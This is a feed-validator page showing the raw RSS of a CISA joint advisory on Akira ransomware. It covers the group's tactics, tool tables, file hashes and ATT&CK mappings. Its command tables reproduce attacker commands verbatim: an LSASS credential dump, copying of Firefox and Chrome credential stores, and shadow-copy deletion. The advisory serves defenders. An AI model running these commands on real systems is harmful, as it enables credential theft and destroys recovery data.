FEED Validator

Congratulations!

This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

• line 82, column 0: description should not contain data-tablesaw-mode attribute (115 occurrences) [help]

  <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-ta ...
  

• line 82, column 0: description should not contain data-tablesaw-minimap attribute (115 occurrences) [help]

  <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-ta ...
  

• line 86, column 0: description should not contain role attribute (393 occurrences) [help]

  <th role="columnheader" data-tablesaw-priority="persist"><strong&gt ...
  

• line 86, column 0: description should not contain data-tablesaw-priority attribute (105 occurrences) [help]

  <th role="columnheader" data-tablesaw-priority="persist"><strong&gt ...
  

• line 775, column 0: description should not contain loading attribute (27 occurrences) [help]

    <div class="c-figure__media">    <img loading="lazy" src="https:/ ...
  

• line 4458, column 0: description should not contain relative URL references: #_Appendix_C:_MITRE (2 occurrences) [help]

  </description>
  

• line 7597, column 2: Missing atom:link with rel="self" [help]

    </channel>
    ^

Source: http://www.us-cert.gov/ncas/alerts.xml

1. <?xml version="1.0" encoding="utf-8"?>
2. <rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0" xml:base="https://www.cisa.gov/">
3.  <channel>
4.    <title>CISA Cybersecurity Advisories</title>
5.    <link>https://www.cisa.gov/</link>
6.    <description/>
7.    <language>en</language>
8.    
9.    <item>
10.  <title>#StopRansomware: Akira Ransomware</title>
11.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a</link>
12.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
13. <p><em><strong>Note: </strong>This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
14. <p>The United States’ Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL) are releasing this joint CSA to disseminate known Akira ransomware IOCs and TTPs identified through FBI investigations and trusted third party reporting as recently as February 2024.</p>
15. <p>Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines. As of January 1, 2024, the ransomware group has impacted over 250 organizations and claimed approximately $42 million (USD) in ransomware proceeds.</p>
16. <p>Early versions of the Akira ransomware variant were written in C++ and encrypted files with a <code>.akira</code> extension; however, beginning in August 2023, some Akira attacks began deploying Megazord, using Rust-based code which encrypts files with a <code>.powerranges</code> extension.  Akira threat actors have continued to use both Megazord and Akira, including Akira_v2 (identified by trusted third party investigations) interchangeably.</p>
17. <p>The FBI, CISA, EC3, and NCSC-NL encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.</p>
18. <p>Download the PDF version of this report:</p>
19.  
20.  
21.  
22.  
23.  
24. <div class="c-file">
25.    <div class="c-file__download">
26.    <a href="https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf" class="c-file__link" target="_blank">AA24-109A #StopRansomware: Akira Ransomware</a>
27.    <span class="c-file__size">(PDF,       591.05 KB
28.  )</span>
29.  </div>
30. </div>
31. <p>For a downloadable copy of IOCs, see:</p>
32.  
33.  
34.  
35.  
36.  
37. <div class="c-file">
38.    <div class="c-file__download">
39.    <a href="https://www.cisa.gov/sites/default/files/2024-04/AA24-109A.stix_0.xml" class="c-file__link" target="_blank">AA24-109A STIX XML</a>
40.    <span class="c-file__size">(XML,       114.01 KB
41.  )</span>
42.  </div>
43. </div>
44.  
45.  
46.  
47.  
48.  
49. <div class="c-file">
50.    <div class="c-file__download">
51.    <a href="https://www.cisa.gov/sites/default/files/2024-04/AA24-109A-StopRansomware-Akira-Ransomware.stix_0.json" class="c-file__link" target="_blank">AA24-109A STIX JSON</a>
52.    <span class="c-file__size">(JSON,       67.80 KB
53.  )</span>
54.  </div>
55. </div>
56. <h3><strong>TECHNICAL DETAILS</strong></h3>
57. <p><strong>Note:</strong> This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK for Enterprise</a> for all referenced tactics and techniques.</p>
58. <h4><strong>Initial Access</strong></h4>
59. <p>The FBI and cybersecurity researchers have observed Akira threat actors obtaining initial access to organizations through a virtual private network (VPN) service without multifactor authentication (MFA) configured[<a href="https://www.fortinet.com/blog/threat-research/ransomware-roundup-akira" title="Ransomware Roundup - Akira">1</a>], mostly using known Cisco vulnerabilities [<a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>] <a href="https://nvd.nist.gov/vuln/detail/CVE-2020-3259" title="CVE-2020-3259">CVE-2020-3259</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-20269" title="CVE-2023-20269">CVE-2023-20269</a>.[<a href="https://blogs.cisco.com/security/akira-ransomware-targeting-vpns-without-multi-factor-authentication" title="Akira Ransomware Targeting VPNs without Multi-Factor Authentication">2</a>],[<a href="https://www.truesec.com/hub/blog/akira-ransomware-and-exploitation-of-cisco-anyconnect-vulnerability-cve-2020-3259" title="Akira Ransomware and Exploitation of Cisco Anyconnect Vulnerability CVE-2020-3259">3</a>],[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">4</a>] Additional methods of initial access include the use of external-facing services such as Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a>], spear phishing [<a href="https://attack.mitre.org/versions/v14/techniques/T1566/001/" title="Phishing: Spearphishing Attachment">T1566.001</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1566/002/" title="Phishing: Spearphishing Link">T1566.002</a>], and the abuse of valid credentials[<a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a>].[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">4</a>]</p>
60. <h4><strong>Persistence and Discovery</strong></h4>
61. <p>Once initial access is obtained, Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts [<a href="https://attack.mitre.org/versions/v14/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a>] to establish persistence. In some instances, the FBI identified Akira threat actors creating an administrative account named <code>itadm</code>.</p>
62. <p>According to FBI and open source reporting, Akira threat actors leverage post-exploitation attack techniques, such as Kerberoasting[<a href="https://www.crowdstrike.com/cybersecurity-101/kerberoasting/" title="KERBEROASTING ATTACKS">5</a>], to extract credentials stored in the process memory of the Local Security Authority Subsystem Service (LSASS) [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>]<a>.</a>[<a href="https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/" title="Akira, again: The ransomware that keeps on taking">6</a>] Akira threat actors also use credential scraping tools [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a>] like Mimikatz and LaZagne to aid in privilege escalation. Tools like SoftPerfect and Advanced IP Scanner are often used for network device discovery (reconnaissance) purposes [<a href="https://attack.mitre.org/versions/v14/techniques/T1016/" title="System Network Configuration Discovery">T1016</a>] and <code>net</code> Windows commands are used to identify domain controllers [<a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a>] and gather information on domain trust relationships [<a href="https://attack.mitre.org/versions/v14/techniques/T1482" title="Domain Trust Discovery">T1482</a>].</p>
63. <p>See Table 1 for a descriptive listing of these tools.</p>
64. <h4><strong>Defense Evasion</strong></h4>
65. <p>Based on trusted third party investigations, Akira threat actors have been observed deploying two distinct ransomware variants against different system architectures within the same compromise event. This marks a shift from recently reported Akira ransomware activity. Akira threat actors were first observed deploying the Windows-specific “Megazord” ransomware, with further analysis revealing that a second payload was concurrently deployed in this attack (which was later identified as a novel variant of the Akira ESXi encryptor, “Akira_v2”).</p>
66. <p>As Akira threat actors prepare for lateral movement, they commonly disable security software to avoid detection. Cybersecurity researchers have observed Akira threat actors using PowerTool to exploit the Zemana AntiMalware driver[<a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">4</a>] and terminate antivirus-related processes [<a href="https://attack.mitre.org/versions/v14/techniques/T1562/001" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].</p>
67. <h4><strong>Exfiltration and Impact</strong></h4>
68. <p>Akira threat actors leverage tools such as FileZilla, WinRAR [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a>], WinSCP, and RClone to exfiltrate data [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>]. To establish command and control channels, threat actors leverage readily available tools like AnyDesk, MobaXterm, RustDesk, Ngrok, and Cloudflare Tunnel, enabling exfiltration through various protocols such as File Transfer Protocol (FTP), Secure File Transfer Protocol (SFTP), and cloud storage services like Mega [<a href="https://attack.mitre.org/versions/v14/techniques/T1537" title="Transfer Data to Cloud Account">T1537</a>] to connect to exfiltration servers.</p>
69. <p>Akira threat actors use a double-extortion model [<a href="https://attack.mitre.org/versions/v14/techniques/T1657/" title="Financial Theft">T1657</a>] and encrypt systems [<a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>] after exfiltrating data. The Akira ransom note provides each company with a unique code and instructions to contact the threat actors via <code>a .onion</code> URL. Akira threat actors do not leave an initial ransom demand or payment instructions on compromised networks, and do not relay this information until contacted by the victim. Ransom payments are paid in Bitcoin to cryptocurrency wallet addresses provided by the threat actors. To further apply pressure, Akira threat actors threaten to publish exfiltrated data on the Tor network, and in some instances have called victimized companies, according to FBI reporting.</p>
70. <h4><strong>Encryption</strong></h4>
71. <p>Akira threat actors utilize a sophisticated hybrid encryption scheme to lock data. This involves combining a ChaCha20 stream cipher with an RSA public-key cryptosystem for speed and secure key exchange [<a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. This multilayered approach tailors encryption methods based on file type and size and is capable of full or partial encryption. Encrypted files are appended with either a <code>.akira</code> or <code>.powerranges</code> extension. To further inhibit system recovery, Akira’s encryptor (<code>w.exe</code>) utilizes PowerShell commands to delete volume shadow copies (VSS) on Windows systems [<a href="https://attack.mitre.org/versions/v14/techniques/T1490" title="Inhibit System Recovery">T1490</a>]. Additionally, a ransom note named <code>fn.txt</code> appears in both the root directory (<code>C:</code>) and each users’ home directory (<code>C:\Users</code>).</p>
72. <p>Trusted third party analysis identified that the Akira_v2 encryptor is an upgrade from its previous version, which includes additional functionalities due to the language it’s written in (Rust). Previous versions of the encryptor provided options to insert arguments at runtime, including:</p>
73. <ul>
74. <li><code>-p --encryption_path (targeted file/folder paths)</code></li>
75. <li><code>-s --share_file (targeted network drive path)</code></li>
76. <li><code>-n --encryption_percent (percentage of encryption)</code></li>
77. <li><code>--fork (create a child process for encryption</code></li>
78. </ul>
79. <p>The ability to insert additional threads allows Akira threat actors to have more granular control over the number of CPU cores in use, increasing the speed and efficiency of the encryption process. The new version also adds a layer of protection, utilizing the Build ID as a run condition to hinder dynamic analysis. The encryptor is unable to execute successfully without the unique Build ID. The ability to deploy against only virtual machines using “<code>vmonly</code>” and the ability to stop running virtual machines with “<code>stopvm</code>” functionalities have also been observed implemented for Akira_v2. After encryption, the Linux ESXi variant may include the file extension “<code>akiranew</code>” or add a ransom note named “<code>akiranew.txt</code>” in directories where files were encrypted with the new nomenclature.</p>
80. <h4><strong>Leveraged Tools</strong></h4>
81. <p>Table 1 lists publicly available tools and applications Akira threat actors have used, including legitimate tools repurposed for their operations. Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</p>
82. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
83. <caption><em>Table 1: Tools Leveraged by Akira Ransomware Actors</em></caption>
84. <thead>
85. <tr>
86. <th role="columnheader" data-tablesaw-priority="persist"><strong>Name</strong></th>
87. <th role="columnheader"><strong>Description</strong></th>
88. </tr>
89. </thead>
90. <tbody>
91. <tr>
92. <td><a href="https://attack.mitre.org/versions/v14/software/S0552/" title="AdFind">AdFind</a></td>
93. <td><code>AdFind.exe</code> is used to query and retrieve information from Active Directory.</td>
94. </tr>
95. <tr>
96. <td>Advanced IP Scanner</td>
97. <td>A network scanner is used to locate all the computers on a network and conduct a scan of their ports. The program shows all network devices, gives access to shared folders, and provides remote control of computers (via RDP and Radmin).</td>
98. </tr>
99. <tr>
100. <td>AnyDesk</td>
101. <td>A common software that can be maliciously used by threat actors to obtain remote access and maintain persistence [<a href="https://attack.mitre.org/versions/v14/techniques/T1219" title="Remote Access Software">T1219</a>]. AnyDesk also supports remote file transfer.</td>
102. </tr>
103. <tr>
104. <td><a href="https://attack.mitre.org/software/S0349" title="LaZagne">LaZagne</a></td>
105. <td>Allows users to recover stored passwords on Windows, Linux, and OSX systems.</td>
106. </tr>
107. <tr>
108. <td>PCHunter64</td>
109. <td>A tool used to acquire detailed process and system information<a> [</a><a href="https://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a>].[<a href="https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/" title="Akira Ransomware is “bringin’ 1988 back”">7</a>]</td>
110. </tr>
111. <tr>
112. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">PowerShell</a></td>
113. <td>A cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</td>
114. </tr>
115. <tr>
116. <td><a href="https://attack.mitre.org/versions/v14/software/S0002/" title="Mimikatz">Mimikatz</a></td>
117. <td>Allows users to view and save authentication credentials such as Kerberos tickets.</td>
118. </tr>
119. <tr>
120. <td><a href="https://attack.mitre.org/versions/v14/software/S0508/" title="ngrok">Ngrok</a></td>
121. <td>A reverse proxy tool [<a href="https://attack.mitre.org/versions/v14/techniques/T1090/" title="Proxy">T1090</a>] used to create a secure tunnel to servers behind firewalls or local machines without a public IP address.</td>
122. </tr>
123. <tr>
124. <td><a href="https://attack.mitre.org/software/S1040" title="Rclone">RClone</a></td>
125. <td>A command line program used to sync files with cloud storage services [<a href="https://attack.mitre.org/versions/v14/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a>] such as Mega.</td>
126. </tr>
127. <tr>
128. <td>SoftPerfect</td>
129. <td>A network scanner (<code>netscan.exe</code>) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It also scans for remote services, registry, files, and performance counters.</td>
130. </tr>
131. <tr>
132. <td>WinRAR</td>
133. <td>Used to split compromised data into segments and to compress [<a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a>] files into <code>.RAR</code> format for exfiltration.</td>
134. </tr>
135. <tr>
136. <td>WinSCP</td>
137. <td>Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Akira threat actors have used it to transfer data [<a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a>] from a compromised network to actor-controlled accounts.</td>
138. </tr>
139. </tbody>
140. </table>
141. <h4><strong>Indicators of Compromise</strong></h4>
142. <p><strong>Disclaimer:</strong> Investigation or vetting of these indicators is recommended prior to taking action, such as blocking.</p>
143. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
144. <caption><em>Table 2a: Malicious Files Affiliated with Akira Ransomware</em></caption>
145. <thead>
146. <tr>
147. <th role="columnheader" data-tablesaw-priority="persist"><strong>File Name</strong></th>
148. <th role="columnheader"><strong>Hash (SHA-256)</strong></th>
149. <th role="columnheader"><strong>Description</strong></th>
150. </tr>
151. </thead>
152. <tbody>
153. <tr>
154. <td>w.exe</td>
155. <td>d2fd0654710c27dcf37b6c1437880020824e161dd0bf28e3a133ed777242a0ca</td>
156. <td>Akira ransomware</td>
157. </tr>
158. <tr>
159. <td>Win.exe</td>
160. <td>dcfa2800754e5722acf94987bb03e814edcb9acebda37df6da1987bf48e5b05e</td>
161. <td>Akira ransomware encryptor</td>
162. </tr>
163. <tr>
164. <td>AnyDesk.exe</td>
165. <td>bc747e3bf7b6e02c09f3d18bdd0e64eef62b940b2f16c9c72e647eec85cf0138</td>
166. <td>Remote desktop application</td>
167. </tr>
168. <tr>
169. <td>Gcapi.dll</td>
170. <td>73170761d6776c0debacfbbc61b6988cb8270a20174bf5c049768a264bb8ffaf</td>
171. <td>DLL file that assists with the execution of AnyDesk.exe</td>
172. </tr>
173. <tr>
174. <td>Sysmon.exe</td>
175. <td>1b60097bf1ccb15a952e5bcc3522cf5c162da68c381a76abc2d5985659e4d386</td>
176. <td>Ngrok tool for persistence</td>
177. </tr>
178. <tr>
179. <td>Config.yml</td>
180. <td>Varies by use</td>
181. <td>Ngrok configuration file</td>
182. </tr>
183. <tr>
184. <td>Rclone.exe</td>
185. <td>aaa647327ba5b855bedea8e889b3fafdc05a6ca75d1cfd98869432006d6fecc9</td>
186. <td>Exfiltration tool</td>
187. </tr>
188. <tr>
189. <td>Winscp.rnd</td>
190. <td>7d6959bb7a9482e1caa83b16ee01103d982d47c70c72fdd03708e2b7f4c552c4</td>
191. <td>Network file transfer program</td>
192. </tr>
193. <tr>
194. <td>WinSCP-6.1.2-Setup.exe</td>
195. <td>36cc31f0ab65b745f25c7e785df9e72d1c8919d35a1d7bd4ce8050c8c068b13c</td>
196. <td>Network file transfer program</td>
197. </tr>
198. <tr>
199. <td>Akira_v2</td>
200. <td>
201. <p>3298d203c2acb68c474e5fdad8379181890b4403d6491c523c13730129be3f75</p>
202. <p>0ee1d284ed663073872012c7bde7fac5ca1121403f1a5d2d5411317df282796c</p>
203. </td>
204. <td>Akira_v2 ransomware</td>
205. </tr>
206. <tr>
207. <td>Megazord</td>
208. <td>
209. <p>ffd9f58e5fe8502249c67cad0123ceeeaa6e9f69b4ec9f9e21511809849eb8fc</p>
210. <p>dfe6fddc67bdc93b9947430b966da2877fda094edf3e21e6f0ba98a84bc53198</p>
211. <p>131da83b521f610819141d5c740313ce46578374abb22ef504a7593955a65f07</p>
212. <p>9f393516edf6b8e011df6ee991758480c5b99a0efbfd68347786061f0e04426c</p>
213. <p>9585af44c3ff8fd921c713680b0c2b3bbc9d56add848ed62164f7c9b9f23d065</p>
214. <p>2f629395fdfa11e713ea8bf11d40f6f240acf2f5fcf9a2ac50b6f7fbc7521c83</p>
215. <p>7f731cc11f8e4d249142e99a44b9da7a48505ce32c4ee4881041beeddb3760be</p>
216. <p>95477703e789e6182096a09bc98853e0a70b680a4f19fa2bf86cbb9280e8ec5a</p>
217. <p>0c0e0f9b09b80d87ebc88e2870907b6cacb4cd7703584baf8f2be1fd9438696d</p>
218. <p>C9c94ac5e1991a7db42c7973e328fceeb6f163d9f644031bdfd4123c7b3898b0</p>
219. </td>
220. <td>Akira “Megazord” ransomware</td>
221. </tr>
222. <tr>
223. <td>VeeamHax.exe</td>
224. <td>aaa6041912a6ba3cf167ecdb90a434a62feaf08639c59705847706b9f492015d</td>
225. <td>Plaintext credential leaking tool</td>
226. </tr>
227. <tr>
228. <td>Veeam-Get-Creds.ps1</td>
229. <td>18051333e658c4816ff3576a2e9d97fe2a1196ac0ea5ed9ba386c46defafdb88</td>
230. <td>PowerShell script for obtaining and decrypting accounts from Veeam servers</td>
231. </tr>
232. <tr>
233. <td>PowershellKerberos TicketDumper</td>
234. <td>5e1e3bf6999126ae4aa52146280fdb913912632e8bac4f54e98c58821a307d32</td>
235. <td>Kerberos ticket dumping tool from LSA cache</td>
236. </tr>
237. <tr>
238. <td>sshd.exe</td>
239. <td>8317ff6416af8ab6eb35df3529689671a700fdb61a5e6436f4d6ea8ee002d694</td>
240. <td>OpenSSH Backdoor</td>
241. </tr>
242. <tr>
243. <td>ipscan-3.9.1-setup.exe</td>
244. <td>892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0</td>
245. <td>Network scanner that scans IP addresses and ports</td>
246. </tr>
247. </tbody>
248. </table>
249. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
250. <caption><em>Table 2b: Malicious Files Affiliated with Akira Ransomware</em></caption>
251. <thead>
252. <tr>
253. <th role="columnheader" data-tablesaw-priority="persist"><strong>File Name</strong></th>
254. <th role="columnheader"><strong>Hash (MD5)</strong></th>
255. <th role="columnheader"><strong>Description</strong></th>
256. </tr>
257. </thead>
258. <tbody>
259. <tr>
260. <td>winrar-x64-623.exe</td>
261. <td>7a647af3c112ad805296a22b2a276e7c</td>
262. <td>Network file transfer program</td>
263. </tr>
264. </tbody>
265. </table>
266. <p><strong>Disclaimer: </strong>While the date/time can be changed by Akira threat actors, trusted third-party analysis confirmed these samples were created on December 28, 2023.</p>
267. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
268. <caption><em>Table 3: Windows Akira Ransomware Samples</em></caption>
269. <thead>
270. <tr>
271. <th role="columnheader" data-tablesaw-priority="persist"><strong>Hash (SHA-256)</strong></th>
272. </tr>
273. </thead>
274. <tbody>
275. <tr>
276. <td>0b5b31af5956158bfbd14f6cbf4f1bca23c5d16a40dbf3758f3289146c565f43</td>
277. </tr>
278. <tr>
279. <td>0d700ca5f6cc093de4abba9410480ee7a8870d5e8fe86c9ce103eec3872f225f</td>
280. </tr>
281. <tr>
282. <td>a2df5477cf924bd41241a3326060cc2f913aff2379858b148ddec455e4da67bc</td>
283. </tr>
284. <tr>
285. <td>03aa12ac2884251aa24bf0ccd854047de403591a8537e6aba19e822807e06a45</td>
286. </tr>
287. <tr>
288. <td>2e88e55cc8ee364bf90e7a51671366efb3dac3e9468005b044164ba0f1624422</td>
289. </tr>
290. <tr>
291. <td>40221e1c2e0c09bc6104548ee847b6ec790413d6ece06ad675fff87e5b8dc1d5</td>
292. </tr>
293. <tr>
294. <td>5ea65e2bb9d245913ad69ce90e3bd9647eb16d992301145372565486c77568a2</td>
295. </tr>
296. <tr>
297. <td>643061ac0b51f8c77f2ed202dc91afb9879f796ddd974489209d45f84f644562</td>
298. </tr>
299. <tr>
300. <td>6f9d50bab16b2532f4683eeb76bd25449d83bdd6c85bf0b05f716a4b49584f84</td>
301. </tr>
302. <tr>
303. <td>fef09b0aa37cbdb6a8f60a6bd8b473a7e5bffdc7fd2e952444f781574abccf64</td>
304. </tr>
305. </tbody>
306. </table>
307. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
308. <caption><em>Table 4: Linux/Unix Akira Ransomware Executable and Linkable Format (ELF) Samples</em></caption>
309. <thead>
310. <tr>
311. <th role="columnheader" data-tablesaw-priority="persist"><strong>Hash (SHA-256)</strong></th>
312. </tr>
313. </thead>
314. <tbody>
315. <tr>
316. <td>e1321a4b2b104f31aceaf4b19c5559e40ba35b73a754d3ae13d8e90c53146c0f</td>
317. </tr>
318. <tr>
319. <td>74f497088b49b745e6377b32ed5d9dfaef3c84c7c0bb50fabf30363ad2e0bfb1</td>
320. </tr>
321. <tr>
322. <td>3d2b58ef6df743ce58669d7387ff94740ceb0122c4fc1c4ffd81af00e72e60a4</td>
323. </tr>
324. </tbody>
325. </table>
326. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
327. <caption><em>Table 5a: Commands Affiliated with Akira Ransomware</em></caption>
328. <thead>
329. <tr>
330. <th role="columnheader" data-tablesaw-priority="persist"><strong>Persistence and Discovery</strong></th>
331. </tr>
332. </thead>
333. <tbody>
334. <tr>
335. <td>nltest /dclist: [<a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a>]</td>
336. </tr>
337. <tr>
338. <td>nltest /DOMAIN_TRUSTS [<a href="https://attack.mitre.org/versions/v14/techniques/T1482/" title="Domain Trust Discovery">T1482</a>]</td>
339. </tr>
340. <tr>
341. <td>net group “Domain admins” /dom [<a href="https://attack.mitre.org/versions/v14/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a>]</td>
342. </tr>
343. <tr>
344. <td>net localgroup “Administrators” /dom [<a href="https://attack.mitre.org/versions/v14/techniques/T1069/001/" title="Permission Groups Discovery: Local Groups">T1069.001</a>]</td>
345. </tr>
346. <tr>
347. <td>tasklist [<a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a>]</td>
348. </tr>
349. <tr>
350. <td>rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full [<a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a>]</td>
351. </tr>
352. </tbody>
353. </table>
354. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
355. <caption><em>Table 5b: Commands Affiliated with Akira Ransomware</em></caption>
356. <thead>
357. <tr>
358. <th role="columnheader" data-tablesaw-priority="persist"><strong>Credential Access</strong></th>
359. </tr>
360. </thead>
361. <tbody>
362. <tr>
363. <td>
364. <p>cmd.exe /Q /c esentutl.exe /y</p>
365. <p>"C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db" /d</p>
366. <p>"C:\Users\<username>\AppData\Roaming\Mozilla\Firefox\Profiles\<firefox_profile_id>.default-release\key4.db.tmp”</p>
367. <p><strong>Note: </strong>Used for accessing Firefox data.</p>
368. </td>
369. </tr>
370. <tr>
371. <td>
372. <p>cmd.exe /Q /c esentutl.exe /y</p>
373. <p>"C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d</p>
374. <p>"C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp”</p>
375. <p><strong>Note: </strong>Used for accessing Google Chrome data.</p>
376. </td>
377. </tr>
378. </tbody>
379. </table>
380. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
381. <caption><em>Table 5c: Commands Affiliated with Akira Ransomware</em></caption>
382. <thead>
383. <tr>
384. <th role="columnheader" data-tablesaw-priority="persist"><strong>Impact</strong></th>
385. </tr>
386. </thead>
387. <tbody>
388. <tr>
389. <td>powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject" [<a href="https://attack.mitre.org/versions/v14/techniques/T1490/" title="Inhibit System Recovery">T1490</a>]</td>
390. </tr>
391. </tbody>
392. </table>
393. <h3><strong>MITRE ATT&CK TACTICS AND TECHNIQUES</strong></h3>
394. <p>See Tables 6 -14 for all referenced Akira threat actor tactics and techniques for enterprise environments in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK® Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
395. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
396. <caption><em>Table 6: Initial Access</em></caption>
397. <thead>
398. <tr>
399. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
400. <th role="columnheader"><strong>ID</strong></th>
401. <th role="columnheader"><strong>Use</strong></th>
402. </tr>
403. </thead>
404. <tbody>
405. <tr>
406. <td>Valid Accounts</td>
407. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a></td>
408. <td>Akira threat actors obtain and abuse credentials of existing accounts as a means of gaining initial access.</td>
409. </tr>
410. <tr>
411. <td>Exploit Public Facing Application</td>
412. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a></td>
413. <td>Akira threat actors exploit vulnerabilities in internet-facing systems to gain access to systems.</td>
414. </tr>
415. <tr>
416. <td>External Remote Services</td>
417. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a></td>
418. <td>Akira threat actors have used remote access services, such as RDP/VPN connection to gain initial access.</td>
419. </tr>
420. <tr>
421. <td>Phishing: Spearphishing Attachment </td>
422. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1566/001/" title="Phishing: Spearphishing Attachment">T1566.001</a></td>
423. <td>Akira threat actors use phishing emails with malicious attachments to gain access to networks.</td>
424. </tr>
425. <tr>
426. <td>Phishing: Spearphishing Link </td>
427. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1566/002/" title="Phishing: Spearphishing Link">T1566.002</a></td>
428. <td>Akira threat actors use phishing emails with malicious links to gain access to networks. </td>
429. </tr>
430. </tbody>
431. </table>
